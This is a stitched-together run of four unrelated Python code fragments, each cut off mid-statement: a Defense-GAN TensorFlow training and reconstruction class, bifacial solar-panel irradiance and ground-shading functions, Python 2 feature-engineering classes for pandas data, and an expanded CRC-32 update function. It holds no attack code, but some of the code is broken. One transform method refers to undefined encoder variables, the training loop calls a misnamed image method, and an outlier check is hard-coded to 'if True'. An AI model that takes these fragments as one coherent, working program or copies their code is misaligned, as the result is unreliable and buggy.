gradient_penalty self.gen_train_op = tf.train.AdamOptimizer( learning_rate=1e-4, beta1=0.5, beta2=0.9 ).minimize(self.generator_cost, var_list=self.generator_vars) self.disc_train_op = tf.train.AdamOptimizer( learning_rate=1e-4, beta1=0.5, beta2=0.9 ).minimize(self.discriminator_cost, var_list=self.discriminator_vars) self.clip_disc_weights = None elif self.mode == 'dcgan': self.generator_cost = tf.reduce_mean( tf.nn.sigmoid_cross_entropy_with_logits( self.disc_fake, tf.ones_like(self.disc_fake) )) disc_cost = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits( self.disc_fake, tf.zeros_like(self.disc_fake) )) disc_cost += tf.reduce_mean( tf.nn.sigmoid_cross_entropy_with_logits( self.disc_real, tf.ones_like(self.disc_real) )) self.discriminator_cost = disc_cost / 2. self.gen_train_op = tf.train.AdamOptimizer( learning_rate=2e-4, beta1=0.5 ).minimize(self.generator_cost, var_list=self.generator_vars) self.disc_train_op = tf.train.AdamOptimizer( learning_rate=2e-4, beta1=0.5 ).minimize(disc_cost, var_list=self.discriminator_vars) self.clip_disc_weights = None def _generate_image(self, training_iter): """Generates a set of sample images from fixed noise and log them in the `debug` directory. Args: training_iter: The training iteration to include as part of the filename. """ samples = self.sess.run(self.fixed_noise_samples) tflib.save_images.save_images( samples.reshape((128, 28, 28)), os.path.join(self.checkpoint_dir.replace('output', 'debug'), 'samples_{}.png'.format(training_iter)) ) def _inf_train_gen(self): """A generator function for input training data.""" while True: for images, targets in self.train_data_gen(): yield images def train(self, phase=None): """Trains the GAN model.""" sess = self.sess self.initialize_uninitialized() gen = self._inf_train_gen() could_load = self.load(checkpoint_dir=self.checkpoint_dir, prefixes=self.save_var_prefixes) if could_load: print('[*] Model loaded.') else: print('[#] No model found') cur_iter = self.sess.run(self.global_step) max_train_iters = self.train_iters step_inc = self.global_step_inc global_step = self.global_step ckpt_dir = self.checkpoint_dir for iteration in xrange(cur_iter, max_train_iters): start_time = time.time() if iteration > 0 and 'gan' in self.mode and phase is None: _ = sess.run(self.gen_train_op, feed_dict={self.is_training: 1}) if self.mode == 'dcgan': disc_iters = 1 else: disc_iters = self.critic_iters for i in xrange(disc_iters): _data = gen.next() _disc_cost, _ = sess.run( [self.discriminator_cost, self.disc_train_op], feed_dict={self.real_data_pl: _data, self.is_training: 1} ) if self.clip_disc_weights is not None: _ = sess.run(self.clip_disc_weights) tflib.plot.plot('{}/train disc cost'.format(self.debug_dir), _disc_cost) tflib.plot.plot('{}/time'.format(self.debug_dir), time.time() - start_time) # Calculate dev loss and generate samples every 100 iters. if iteration % 100 == 5: dev_disc_costs = [] dev_ctr = 0 for images, _ in self.dev_gen(): dev_ctr += 1 if dev_ctr > 20: break _dev_disc_cost = sess.run( self.discriminator_cost, feed_dict={self.real_data_pl: images, self.is_training: 0} ) dev_disc_costs.append(_dev_disc_cost) tflib.plot.plot('{}/dev disc cost'.format(self.debug_dir), np.mean(dev_disc_costs)) self.generate_image(iteration) # Write logs every 100 iters if (iteration < 5) or (iteration % 100 == 99): tflib.plot.flush() self.sess.run(step_inc) if iteration % 500 == 499: self.save(checkpoint_dir=ckpt_dir, global_step=global_step) tflib.plot.tick() self.save(checkpoint_dir=ckpt_dir, global_step=global_step) self.close_session() def reconstruct( self, images, batch_size=None, back_prop=True, reconstructor_id=0, z_init_val=None): """Creates the reconstruction op for Defense-GAN. Args: X: Input tensor Returns: The `tf.Tensor` of the reconstructed input. """ # Batch size is needed because the latent codes are `tf.Variable`s and # need to be built into TF's static graph beforehand. batch_size = batch_size if batch_size else self.test_batch_size x_shape = images.get_shape().as_list() x_shape[0] = batch_size # Repeat images self.rec_rr times to handle random restarts in # parallel. images_tiled_rr = tf.reshape( images, [x_shape[0], np.prod(x_shape[1:])]) images_tiled_rr = tf.tile(images_tiled_rr, [1, self.rec_rr]) images_tiled_rr = tf.reshape( images_tiled_rr, [x_shape[0] * self.rec_rr] + x_shape[1:]) # Number of reconstruction iterations. with tf.variable_scope(tf.get_variable_scope(), reuse=tf.AUTO_REUSE): rec_iter_const = tf.get_variable( 'rec_iter_{}'.format(reconstructor_id), initializer=tf.constant(0), trainable=False, dtype=tf.int32, collections=[tf.GraphKeys.LOCAL_VARIABLES], ) # The latent variables. z_hat = tf.get_variable( 'z_hat_rec_{}'.format(reconstructor_id), shape=[batch_size * self.rec_rr, self.latent_dim], dtype=tf.float32, initializer=tf.random_normal_initializer( stddev=np.sqrt(1.0 / self.latent_dim)), collections=[tf.GraphKeys.LOCAL_VARIABLES] ) # Learning rate for reconstruction. rec_lr_op_from_const = self.get_learning_rate(init_lr=self.rec_lr, global_step=rec_iter_const, decay_mult=0.1, decay_iter=np.ceil( self.rec_iters * 0.8).astype( np.int32)) # The optimizer. rec_online_optimizer = tf.train.MomentumOptimizer( learning_rate=rec_lr_op_from_const, momentum=0.7, name='rec_optimizer') init_z = tf.no_op() if z_init_val is not None: init_z = tf.assign(z_hat, z_init_val) z_hats_recs = self.generator_fn(z_hat, is_training=False) num_dim = len(z_hats_recs.get_shape()) axes = range(1, num_dim) image_rec_loss = tf.reduce_mean( tf.square(z_hats_recs - images_tiled_rr), axis=axes) rec_loss = tf.reduce_sum(image_rec_loss) rec_online_optimizer.minimize(rec_loss, var_list=[z_hat]) def rec_body(i, *args): z_hats_recs = self.generator_fn(z_hat, is_training=False) image_rec_loss = tf.reduce_mean( tf.square(z_hats_recs - images_tiled_rr), axis=axes) rec_loss = tf.reduce_sum(image_rec_loss) train_op = rec_online_optimizer.minimize(rec_loss, var_list=[z_hat]) return tf.tuple( [tf.add(i, 1), rec_loss, image_rec_loss, z_hats_recs], control_inputs=[train_op]) rec_iter_condition = lambda i, *args: tf.less(i, self.rec_iters) for opt_var in rec_online_optimizer.variables(): tf.add_to_collection( tf.GraphKeys.LOCAL_VARIABLES, opt_var, ) with tf.control_dependencies([init_z]): online_rec_iter, online_rec_loss, online_image_rec_loss, \ all_z_recs = tf.while_loop( rec_iter_condition, rec_body, [rec_iter_const, rec_loss, image_rec_loss, z_hats_recs] , parallel_iterations=1, back_prop=back_prop, swap_memory=False) final_recs = [] for i in range(batch_size): ind = i * self.rec_rr + tf.argmin( online_image_rec_loss[ i * self.rec_rr:(i + 1) * self.rec_rr ], axis=0) final_recs.append(all_z_recs[tf.cast(ind, tf.int32)]) online_rec = tf.stack(final_recs) return tf.reshape(online_rec, x_shape) def reconstruct_dataset(self, ckpt_path=None, max_num=-1, max_num_load=-1): """Reconstructs the images of the config's dataset with the generator. """ if not self.initialized: self.load_generator(ckpt_path=ckpt_path) splits = ['train', 'dev', 'test'] rec = self.reconstruct(self.real_data_test) self.sess.run(tf.local_variables_initializer()) rets = {} for split in splits: if max_num > 0: output_dir = os.path.join(self.checkpoint_dir, 'recs_rr{:d}_lr{:.5f}_' 'iters{:d}_num{:d}'.format( self.rec_rr, self.rec_lr, self.rec_iters, max_num), split) else: output_dir =
index1): actualGroundGHI += frontGroundGHI[k] * (k + 1.0 - projectedX1); elif (k == index2): if (k < 100): actualGroundGHI += frontGroundGHI[k] * (projectedX2 - k); else: actualGroundGHI += frontGroundGHI[k - 100] * (projectedX2 - k); else: if (k < 100): actualGroundGHI += frontGroundGHI[k]; else: actualGroundGHI += frontGroundGHI[k - 100]; actualGroundGHI /= projectedX2 - projectedX1; # Irradiance on ground in the 1 degree field of view #if (i == 0) # Console.WriteLine("j=0 index1=1 index2=2 projectX1=3,5:0.0 projectX2=4,5:0.0 actualGrdGHI=5,6:0.0", j, index1, index2, projectedX1, projectedX2, actualGroundGHI); frontGTI[i] += 0.5 * (math.cos(j * DTOR) - math.cos((j + 1) * DTOR)) * SegAOIcor[index][j] * actualGroundGHI * albedo; # Add ground reflected component frontReflected[i] += 0.5 * (math.cos(j * DTOR) - math.cos((j + 1) * DTOR)) * actualGroundGHI * albedo * (1.0 - SegAOIcor[index][j] * (1.0 - Ro)); # Reflected ground radiation from module #Console.WriteLine("actualGroundGHI = 0,6:0.0 inputGHI = 1,6:0.0 aveArrayGroundGHI = 2,6:0.0", actualGroundGHI, dhi + dni * math.cos(zen), aveGroundGHI); # End of j loop for adding ground reflected componenet # Calculate and add direct and circumsolar irradiance components inc, tiltr, sazmr = sunIncident(0, beta / DTOR, sazm / DTOR, 45.0, zen, azm) # For calling PerezComp to break diffuse into components for 90 degree tilt (vertical) # print "sunIncident 2." # print "inc = ", inc # print "tiltr = ", tiltr # print "sazmr = ", sazmr # print " INCIDENT REALY NEEDED for AOI ", inc gtiAllpc, iso_dif, circ_dif, horiz_dif, grd_dif, beam = perezComp(dni, dhi, albedo, inc, tiltr, zen) # Call to get components for the tilt # print "PEREZCOMP 2 = " # print "gtiAllpc = ", vti # print "iso_dif = ", iso_dif # print "circ_dif = ", circ_dif # print "horiz_dif = ", horiz_dif # print "grd_dif = ", grd_dif # print "beam = ", beam cellShade = pvFrontSH * cellRows - i; if (cellShade > 1.0): # Fully shaded if > 1, no shade if < 0, otherwise fractionally shaded cellShade = 1.0; elif (cellShade < 0.0): cellShade = 0.0; if (cellShade < 1.0 and inc < math.pi / 2.0): # Cell not shaded entirely and inc < 90 deg cor = aOIcorrection(n2, inc); # Get AOI correction for beam and circumsolar frontGTI[i] += (1.0 - cellShade) * (beam + circ_dif) * cor; # Add beam and circumsolar radiation #frontReflected[i] += (1.0 - cellShade) * (beam + circ_dif) * (1.0 - cor * (1.0 - Ro)); # Reflected beam and circumsolar radiation from module # End of for i = 0; i < cellRows loop return aveGroundGHI, frontGTI, frontReflected; # End of GetFrontSurfaceIrradiances def getGroundShadeFactors(rowType, beta, C, D, elv, azm, sazm): """ This method determines if the ground is shaded from direct beam radiation for points on the ground from the leading edge of one row of PV panels to the leading edge of the next row of PV panels behind it. This row-to-row dimension is divided into 100 ground segments and a ground shade factor is returned for each ground segment, with values of 1 for shaded segments and values of 0 for non shaded segments. The fractional amounts of shading of the front and back surfaces of the PV panel are also returned. 8/20/2015 4/18/2016 - Modified to account for different row types. Because the ground factors may now be different depending on row, they are calculated for the row-to-row dimension to the rear of the leading module edge and to the front of the leading edge. Also returned is the maximum shadow length projected to the front or rear from the front of the module row Parameters ---------- rowType : str "first", "interior", "last", or "single" beta Tilt from horizontal of the PV modules/panels (deg) C Ground clearance of PV panel (in PV panel slope lengths) D Horizontal distance between rows of PV panels (in PV panel slope lengths) elv Sun elevation (in radians) azm Sun azimuth (in radians) sazm Surface azimuth of PV panels (deg) Returns ------- pvFrontSH : numeric Decimal fraction of the front surface of the PV panel that is shaded, 0.0 to 1.0 pvBackSH : numeric Decimal fraction of the back surface of the PV panel that is shaded, 0.0 to 1.0 rearGroundSH : array of size [100] Ground shade factors for ground segments to the rear, 0 = not shaded, 1 = shaded frontGroundSH : array of size [100] Ground shade factors for ground segments to the front, 0 = not shaded, 1 = shaded maxShadow : numeric Maximum shadow length projected to the front(-) or rear (+) from the front of the module row (in PV panel slope lengths), only used later for rowTypes other than "interior" """ rearGroundSH = [] frontGroundSH = [] beta = beta * DTOR # Tilt from horizontal of the PV modules/panels, in radians sazm = sazm * DTOR # Surface azimuth of PV module/pamels, in radians h = math.sin(beta); # Vertical height of sloped PV panel (in PV panel slope lengths) x1 = math.cos(beta); # Horizontal distance from front of panel to rear of panel (in PV panel slope lengths) rtr = D + x1; # Row-to-row distance (in PV panel slope lengths) # Divide the row-to-row spacing into 100 intervals for calculating ground shade factors delta = rtr / 100.0; x = -delta / 2.0; # Initialize horizontal dimension x to provide midpoof intervals Lh = (h / math.tan(elv)) * math.cos(sazm - azm); # Horizontal length of shadow perpindicular to row from top of module to bottom of module Lhc = ((h + C) / math.tan(elv)) * math.cos(sazm - azm); # Horizontal length of shadow perpindicular to row from top of module to ground level Lc = (C / math.tan(elv)) * math.cos(sazm - azm); # Horizontal length of shadow perpindicular to row from bottom of module to ground level ss1 = 0.0; se1 = 0.0; ss2 = 0.0; se2 = 0.0; # Initialize shading start (s) and end (e) to zeros for two potential shading segments pvFrontSH = 0.0; pvBackSH = 0.0; if (rowType == "interior"): if (Lh > D): # Front side of PV module partially shaded, back completely shaded, ground completely shaded pvFrontSH = (Lh - D) / (Lh + x1); pvBackSH = 1.0; ss1 = 0.0; # Ground shaded from 0.0 to rtr se1 = rtr; elif (Lh < -(rtr + x1)): # Back side of PV module partially shaded, front completely shaded, ground completely shaded pvFrontSH = 1.0; pvBackSH = (Lh + rtr + x1) / (Lh + x1); ss1 = 0.0; # Ground shaded from 0.0 to rtr se1 = rtr; else: # Ground is partially shaded (I assume) if (Lhc >= 0.0): # Shadow to rear of row, module front unshaded, back shaded pvFrontSH = 0.0; pvBackSH = 1.0; Ss = Lc; # Shadow starts at Lc Se = Lhc + x1; # Shadow ends here while (Ss > rtr): Ss -= rtr; # Put shadow in correct rtr space if needed Se -= rtr; ss1 = Ss; se1 = Se; if (se1 > rtr): # then need to use two shade areas se1 = rtr; ss2 = 0.0; se2 = Se - rtr; if (se2 > ss1): # This would mean ground completely shaded, does this occur? ss1 = 0.0; # Ground shaded from 0.0 to rtr se1 = rtr; else: # Shadow to front of row, either front or back might be shaded, depending on tilt and other factors Ss = 0.0; # Shadow starts at Lc, initialize Se = 0.0; # Shadow ends here, initialize if (Lc < Lhc + x1): pvFrontSH =
# !/usr/bin/python # -*- coding: utf-8 -*- """ This script is designed to store some kind of feature engineering methods. """ # Import necessary libraries. import matplotlib.pyplot as plt import numpy as np import pandas as pd import scipy import warnings import logging from scipy.stats import kstest from scipy.stats import shapiro import scipy.stats as spstats from sklearn.preprocessing import * import data_clean as dc from config import output_log from util import PowerTransformer warnings.filterwarnings('ignore') # Create logger for debugging. output_log.init_log('./log/crawl_html') class CategoryCombiner(object): """The class to combine categories with little instance. """ def __init__(self, cate_columns, discard_ratio=0.01): """Initialize class with given parameters. :param cate_columns: List. The list of category columns, which would be processed. :param discard_ratio: The ratio set to filter out categories which should be combined. """ # Assign values of parameters. self.cate_columns = cate_columns self.discard_ratio = discard_ratio # Create dictionary to store list of discard categories for each column. self.discard_cate_dic = {} def fit_transform(self, data): """Combine categories whose instance number is small, in train data. Combine categories whose instance number is small, and replace them with 'Others' value. :param data: Dataframe. The Pandas dataframe to be processed. :return: Dataframe. The result dataframe after processing. """ # Combine categories whose ratio are under discard_ratio into one 'Others' category. for column in self.cate_columns: total_num = float(sum(data[column].value_counts())) discard_cate = [] for key in data[column].value_counts().keys(): if data[column].value_counts()[key] / total_num < self.discard_ratio: discard_cate.append(key) data[column] = data[column].replace(discard_cate, 'Others') # Store discard categories for each column. self.discard_cate_dic[column] = discard_cate return data def transform(self, data): """Combine categories for each column in test data. Apply the method in fit() to transform test data in the same way. :param data: Dataframe. The Pandas dataframe to be transformed. :return: Dataframe. The dataframe after transforming. """ # Combine categories whose ratio are under discard_ratio into one 'Others' category. for column in self.cate_columns: discard_cate = self.discard_cate_dic[column] data[column] = data[column].replace(discard_cate, 'Others') return data class CategoryFeatureEngineer(object): """The class to apply feature engineering automatically. """ def __init__(self, cate_columns): """Initialize class with given parameters. :param cate_columns: List. The list consists of category column names. """ # Assign parameters. self.cate_columns = cate_columns # Create convert dictionary. self.cate_encoding_dic = {} self.cate_combiner = None self.cate_label_dic = {} self.cate_na_filler = None def fit_transform(self, dataset): """Feature engineering for category columns. Conduct feature engineering to category columns. Including several kind of methods, as followings: 1. Fill NA wil 'missing'. 2. Combine small categories into one same category. 3. One-hot encoding for category columns. :param dataset: Dataframe. The input dataframe. :return: Dataframe. The output dataframe with converted category columns. """ # Fill None with 'missing' for category columns. data = dataset.copy() na_filler = dc.NaFiller() data = na_filler.fit_transform(data, self.cate_columns) self.cate_na_filler = na_filler # Combine categories whose ratio are under 0.01 into one 'Others' category. cate_combiner = CategoryCombiner(self.cate_columns) data = cate_combiner.fit_transform(data) self.cate_combiner = cate_combiner # Label encoder to convert values in category column into numeric values. result = pd.DataFrame() for column in self.cate_columns: gen_le = LabelEncoder() result[column] = gen_le.fit_transform(data[column]) # Store label encoder into dictionary. self.cate_label_dic[column] = gen_le # Encode category columns with One-hot Encoding method. gen_ohe = OneHotEncoder() gen_ohe.fit(result[[column]]) gen_feature_arr = gen_ohe.transform(result[[column]]).toarray() gen_feature_labels = [column + '_' + str(cls_label) for cls_label in gen_le.classes_] gen_features = pd.DataFrame(gen_feature_arr, columns=gen_feature_labels) result = pd.concat([result, gen_features], axis=1) # Store encoders into dictionary. self.cate_encoding_dic[column] = gen_ohe data = data.reset_index() # Add other columns into result. for column in data.columns: if column not in self.cate_columns and column != 'index': result = pd.concat([result, data[column]], axis=1) return result def transform(self, data): """The feature engineering for category columns. The feature engineering method applied on test data, using the same in fit_transform() function. :param data: Dataframe. The input Pandas dataframe, to be processed. :return: Dataframe. The processed dataframe. """ # Fill None with 'missing' for category columns. data = self.cate_na_filler.transform(data, self.cate_columns) # Combine categories whose ratio are under 0.01 into one 'Others' category. data = cate_combiner.transform(data) # Label encoder to convert values in category column into numeric values. for column in self.cate_columns: # Apply label encoder to transform category columns. data[column] = gen_le.transform(data[column]) # Encode category columns with One-hot Encoding method. gen_feature_arr = gen_ohe.transform(data[[column]]).toarray() gen_feature_labels = [column + '_' + str(cls_label) for cls_label in gen_le.classes_] gen_features = pd.DataFrame(gen_feature_arr, columns=gen_feature_labels) data = pd.concat([data, gen_features], axis=1) return data def column_type_detection(data, id_col, target_col): """Detect column type and collect according to column type. Given id column name and target column name, divide columns into ID_col, target_col, numeric_col and category_col. :param data: Dataframe. The input dataframe in pandas form. :param id_col: List. The list of ID column names. :param target_col: List. The list of Target column names. :return: List. Numeric_col, Category_col. """ # Loop through features and divide into two parts according to data types. cate_columns = [] num_columns = [] for key in data.dtypes.keys(): # Skip id and target columns. if key in id_col or key in target_col: continue # If data type is not in ['float', 'int'], column is collected by cate_col. if data.dtypes[key] not in ['float', 'int']: cate_columns.append(key) # Convert all the cat_col into 'object' data type. data[key] = data[key].astype('object') else: num_columns.append(key) return num_columns, cate_columns class NumericFeatureEngineer(object): """The class for numeric feature engineering. """ def __init__(self, num_columns): """Initialize class with given parameters. :param num_columns: List. The list consists of numeric column names. """ # Assign parameters. self.num_columns = num_columns # Create dictionaries for converters. self.num_transform_dic = {} self.num_na_filler = None @staticmethod def check_normal_distribution(data): """Function to test whether the data is normal distribution or not. Use some statistic methods to test normal distribution, numerically. :param data: Dataframe. One column dataframe, waited to be tested. :return: stat: Some statistic result from test. p: P-value to reject Null hypothesis, which means it's not normal distribution. """ # normality test stat, p = shapiro(data) return stat, p def fit_transform(self, dataset): """Feature engineering for numeric columns. Conduct feature engineering to numeric columns. Including several kind of methods, as followings: 1. Fill NA wil mean. 3. Detect and convert to normal distribution. 4. Standardization. 5. Round to float3. :param dataset: Dataframe. The input dataframe. :return: Dataframe. The output dataframe with converted numeric columns. """ # Convert numerical columns whose distributions are not normal to normal distribution. # Check whether the distribution is normal or not. data = dataset.copy() for column in self.num_columns: print column # Normality test. stat, p = self.check_normal_distribution(data[column]) print(column, ': Statistics=%.3f, p=%.3f' % (stat, p)), # When p-value is under 0.05, it means the distribution is different to normal distribution. alpha = 0.05 # Set cutoff to reject the Null hypothesis. if p < alpha: print('Sample does not look Gaussian (reject H0)'), # Calculate skewness of distribution. skewness = data[column].skew(axis=0) # Check whether there are outliers or not. outlier_detector = dc.OutlierDetector(data, [], []) outlier_index = outlier_detector.mean_detection(data[column]) # todo check outlier function. if True: # Check whether there are negative values. print '\nThere is no outlier.' if sum(data[column] < 0) == 0: # If there is none of negative values, apply Box-cox transformation. power_transformer = PowerTransformer(method='box-cox') data[column] = power_transformer.fit_transform(data[column].reshape(-1, 1)) else: # If there are some negative values, apply yeo-johnson method. power_transformer = PowerTransformer(method='yeo-johnson') data[column] = power_transformer.fit_transform(data[column].reshape(-1, 1)) # Store power transformer into dictionary. self.num_transform_dic[column] = power_transformer else: # If there are some outliers, apply quantile transformer to normal distribution. quantile_transformer = QuantileTransformer(output_distribution='normal', random_state=1021) data[column] = quantile_transformer.fit_transform(data[column].reshape(-1, 1)) # Store quantile transformer into dictionary. self.num_transform_dic[column] = quantile_transformer else: print('Sample looks Gaussian (fail to reject H0)') # If the column is normal distribution, assign 'None' to transformer dictionary. self.num_transform_dic[column] = None # Round the number into .3float, to lower running time. data = data.round(3) # Fill None with 'mean' for numerical columns. na_filler = dc.NaFiller() data = na_filler.fit_transform(data, self.num_columns) # Store imputer into dictionary. self.num_na_filler = na_filler return data def transform(self, data): """Transform numeric column, especially for test data. Apply same method in fit_transform() function to transform target dataframe. :param data: Dataframe. The target Pandas dataframe to be transformed. :return: Dataframe. The processed dataframe. """ # Convert numerical columns whose distributions are not normal to normal distribution. for column in
^ q(31) ^ d(1) ^ d(5) ^ d(6) ^ d(9) ^ d(13) ^ d(14) ^ d(18) ^ d(20) ^ d(22) ^ d(23), q(10) ^ q(14) ^ q(15) ^ q(18) ^ q(22) ^ q(23) ^ q(27) ^ q(29) ^ q(31) ^ d(2) ^ d(6) ^ d(7) ^ d(10) ^ d(14) ^ d(15) ^ d(19) ^ d(21) ^ d(23), q(11) ^ q(15) ^ q(16) ^ q(19) ^ q(23) ^ q(24) ^ q(28) ^ q(30) ^ d(3) ^ d(7) ^ d(8) ^ d(11) ^ d(15) ^ d(16) ^ d(20) ^ d(22), q(12) ^ q(16) ^ q(17) ^ q(20) ^ q(24) ^ q(25) ^ q(29) ^ q(31) ^ d(4) ^ d(8) ^ d(9) ^ d(12) ^ d(16) ^ d(17) ^ d(21) ^ d(23), q(13) ^ q(17) ^ q(18) ^ q(21) ^ q(25) ^ q(26) ^ q(30) ^ d(5) ^ d(9) ^ d(10) ^ d(13) ^ d(17) ^ d(18) ^ d(22), q(8) ^ q(17) ^ q(19) ^ q(20) ^ q(22) ^ q(24) ^ q(26) ^ q(27) ^ q(31) ^ d(0) ^ d(9) ^ d(11) ^ d(12) ^ d(14) ^ d(16) ^ d(18) ^ d(19) ^ d(23), q(8) ^ q(9) ^ q(14) ^ q(17) ^ q(21) ^ q(23) ^ q(24) ^ q(25) ^ q(27) ^ q(28) ^ d(0) ^ d(1) ^ d(6) ^ d(9) ^ d(13) ^ d(15) ^ d(16) ^ d(17) ^ d(19) ^ d(20), q(0) ^ q(9) ^ q(10) ^ q(15) ^ q(18) ^ q(22) ^ q(24) ^ q(25) ^ q(26) ^ q(28) ^ q(29) ^ d(1) ^ d(2) ^ d(7) ^ d(10) ^ d(14) ^ d(16) ^ d(17) ^ d(18) ^ d(20) ^ d(21), q(1) ^ q(10) ^ q(11) ^ q(16) ^ q(19) ^ q(23) ^ q(25) ^ q(26) ^ q(27) ^ q(29) ^ q(30) ^ d(2) ^ d(3) ^ d(8) ^ d(11) ^ d(15) ^ d(17) ^ d(18) ^ d(19) ^ d(21) ^ d(22), q(2) ^ q(8) ^ q(11) ^ q(12) ^ q(14) ^ q(18) ^ q(26) ^ q(27) ^ q(28) ^ q(30) ^ q(31) ^ d(0) ^ d(3) ^ d(4) ^ d(6) ^ d(10) ^ d(18) ^ d(19) ^ d(20) ^ d(22) ^ d(23), q(3) ^ q(9) ^ q(12) ^ q(13) ^ q(15) ^ q(19) ^ q(27) ^ q(28) ^ q(29) ^ q(31) ^ d(1) ^ d(4) ^ d(5) ^ d(7) ^ d(11) ^ d(19) ^ d(20) ^ d(21) ^ d(23), q(4) ^ q(10) ^ q(13) ^ q(14) ^ q(16) ^ q(20) ^ q(28) ^ q(29) ^ q(30) ^ d(2) ^ d(5) ^ d(6) ^ d(8) ^ d(12) ^ d(20) ^ d(21) ^ d(22), q(5) ^ q(11) ^ q(14) ^ q(15) ^ q(17) ^ q(21) ^ q(29) ^ q(30) ^ q(31) ^ d(3) ^ d(6) ^ d(7) ^ d(9) ^ d(13) ^ d(21) ^ d(22) ^ d(23), q(6) ^ q(12) ^ q(15) ^ q(16) ^ q(18) ^ q(22) ^ q(30) ^ q(31) ^ d(4) ^ d(7) ^ d(8) ^ d(10) ^ d(14) ^ d(22) ^ d(23), q(7) ^ q(13) ^ q(16) ^ q(17) ^ q(19) ^ q(23) ^ q(31) ^ d(5) ^ d(8) ^ d(9) ^ d(11) ^ d(15) ^ d(23), ) def _generate_next_2B_crc(self, current_crc, data_in): """ Generates the next round of our CRC; given a 2B trailing input word . """ # Helper functions that help us more clearly match the expanded polynomial form. d = lambda i : data_in[len(data_in) - i - 1] q = lambda i : current_crc[i] # These lines are extremely long, but there doesn't seem any advantage in clarity to splitting them. return Cat( q(16) ^ q(22) ^ q(25) ^ q(26) ^ q(28) ^ d(0) ^ d(6) ^ d(9) ^ d(10) ^ d(12), q(16) ^ q(17) ^ q(22) ^ q(23) ^ q(25) ^ q(27) ^ q(28) ^ q(29) ^ d(0) ^ d(1) ^ d(6) ^ d(7) ^ d(9) ^ d(11) ^ d(12) ^ d(13), q(16) ^ q(17) ^ q(18) ^ q(22) ^ q(23) ^ q(24) ^ q(25) ^ q(29) ^ q(30) ^ d(0) ^ d(1) ^ d(2) ^ d(6) ^ d(7) ^ d(8) ^ d(9) ^ d(13) ^ d(14), q(17) ^ q(18) ^ q(19) ^ q(23) ^ q(24) ^ q(25) ^ q(26) ^ q(30) ^ q(31) ^ d(1) ^ d(2) ^ d(3) ^ d(7) ^ d(8) ^ d(9) ^ d(10) ^ d(14) ^ d(15), q(16) ^ q(18) ^ q(19) ^ q(20) ^ q(22) ^ q(24) ^ q(27) ^ q(28) ^ q(31) ^ d(0) ^ d(2) ^ d(3) ^ d(4) ^ d(6) ^ d(8) ^ d(11) ^ d(12) ^ d(15), q(16) ^ q(17) ^ q(19) ^ q(20) ^ q(21) ^ q(22) ^ q(23) ^ q(26) ^ q(29) ^ d(0) ^ d(1) ^ d(3) ^ d(4) ^ d(5) ^ d(6) ^ d(7) ^ d(10) ^ d(13), q(17) ^ q(18) ^ q(20) ^ q(21) ^ q(22) ^ q(23) ^ q(24) ^ q(27) ^ q(30) ^ d(1) ^ d(2) ^ d(4) ^ d(5) ^ d(6) ^ d(7) ^ d(8) ^ d(11) ^ d(14), q(16) ^ q(18) ^ q(19) ^ q(21) ^ q(23) ^ q(24) ^ q(26) ^ q(31) ^ d(0) ^ d(2) ^ d(3) ^ d(5) ^ d(7) ^ d(8) ^ d(10) ^ d(15), q(16) ^ q(17) ^ q(19) ^ q(20) ^ q(24) ^ q(26) ^ q(27) ^ q(28) ^ d(0) ^ d(1) ^ d(3) ^ d(4) ^ d(8) ^ d(10) ^ d(11) ^ d(12), q(17) ^ q(18) ^ q(20) ^ q(21) ^ q(25) ^ q(27) ^ q(28) ^ q(29) ^ d(1) ^ d(2) ^ d(4) ^ d(5) ^ d(9) ^ d(11) ^ d(12) ^ d(13), q(16) ^ q(18) ^ q(19) ^ q(21) ^ q(25) ^ q(29) ^ q(30) ^ d(0) ^ d(2) ^ d(3) ^ d(5) ^ d(9) ^ d(13) ^ d(14), q(16) ^ q(17) ^ q(19) ^ q(20) ^ q(25) ^ q(28) ^ q(30) ^ q(31) ^ d(0) ^ d(1) ^ d(3) ^ d(4) ^ d(9) ^ d(12) ^ d(14) ^ d(15), q(16) ^ q(17) ^ q(18) ^ q(20) ^ q(21) ^ q(22) ^ q(25) ^ q(28) ^ q(29) ^ q(31) ^ d(0) ^ d(1) ^ d(2) ^ d(4) ^ d(5) ^ d(6) ^ d(9) ^ d(12) ^ d(13) ^ d(15), q(17) ^ q(18) ^ q(19) ^ q(21) ^ q(22) ^ q(23) ^ q(26) ^ q(29) ^ q(30) ^ d(1) ^ d(2) ^ d(3) ^ d(5) ^ d(6) ^ d(7) ^ d(10) ^ d(13) ^ d(14), q(18) ^ q(19) ^ q(20) ^ q(22) ^ q(23) ^ q(24) ^ q(27) ^ q(30) ^ q(31) ^ d(2) ^ d(3) ^ d(4) ^ d(6) ^ d(7) ^ d(8) ^ d(11) ^ d(14) ^ d(15), q(19) ^ q(20) ^ q(21) ^ q(23) ^ q(24) ^ q(25) ^ q(28) ^ q(31) ^ d(3) ^ d(4) ^ d(5) ^ d(7) ^ d(8) ^ d(9) ^ d(12) ^ d(15), q(0) ^ q(16) ^ q(20) ^ q(21) ^ q(24) ^ q(28) ^ q(29) ^ d(0) ^ d(4) ^ d(5) ^ d(8) ^ d(12) ^ d(13), q(1) ^ q(17) ^ q(21) ^ q(22) ^ q(25) ^ q(29) ^ q(30) ^ d(1) ^ d(5) ^ d(6) ^ d(9) ^ d(13) ^ d(14), q(2) ^ q(18) ^ q(22) ^ q(23) ^ q(26) ^ q(30) ^ q(31) ^ d(2) ^ d(6) ^ d(7) ^ d(10) ^ d(14) ^ d(15), q(3) ^ q(19) ^ q(23) ^ q(24) ^ q(27) ^ q(31) ^ d(3) ^ d(7) ^ d(8) ^ d(11) ^ d(15), q(4) ^ q(20) ^ q(24) ^ q(25) ^ q(28) ^ d(4) ^ d(8) ^ d(9) ^ d(12), q(5) ^ q(21) ^ q(25) ^ q(26) ^ q(29) ^ d(5) ^ d(9) ^ d(10) ^ d(13), q(6) ^ q(16) ^ q(25) ^ q(27) ^ q(28) ^ q(30) ^ d(0) ^ d(9) ^ d(11) ^ d(12) ^ d(14), q(7) ^ q(16) ^ q(17) ^ q(22) ^ q(25) ^ q(29) ^ q(31) ^ d(0) ^ d(1) ^ d(6) ^ d(9) ^ d(13) ^ d(15), q(8) ^ q(17) ^ q(18) ^ q(23) ^ q(26) ^ q(30) ^ d(1) ^ d(2) ^ d(7) ^ d(10)
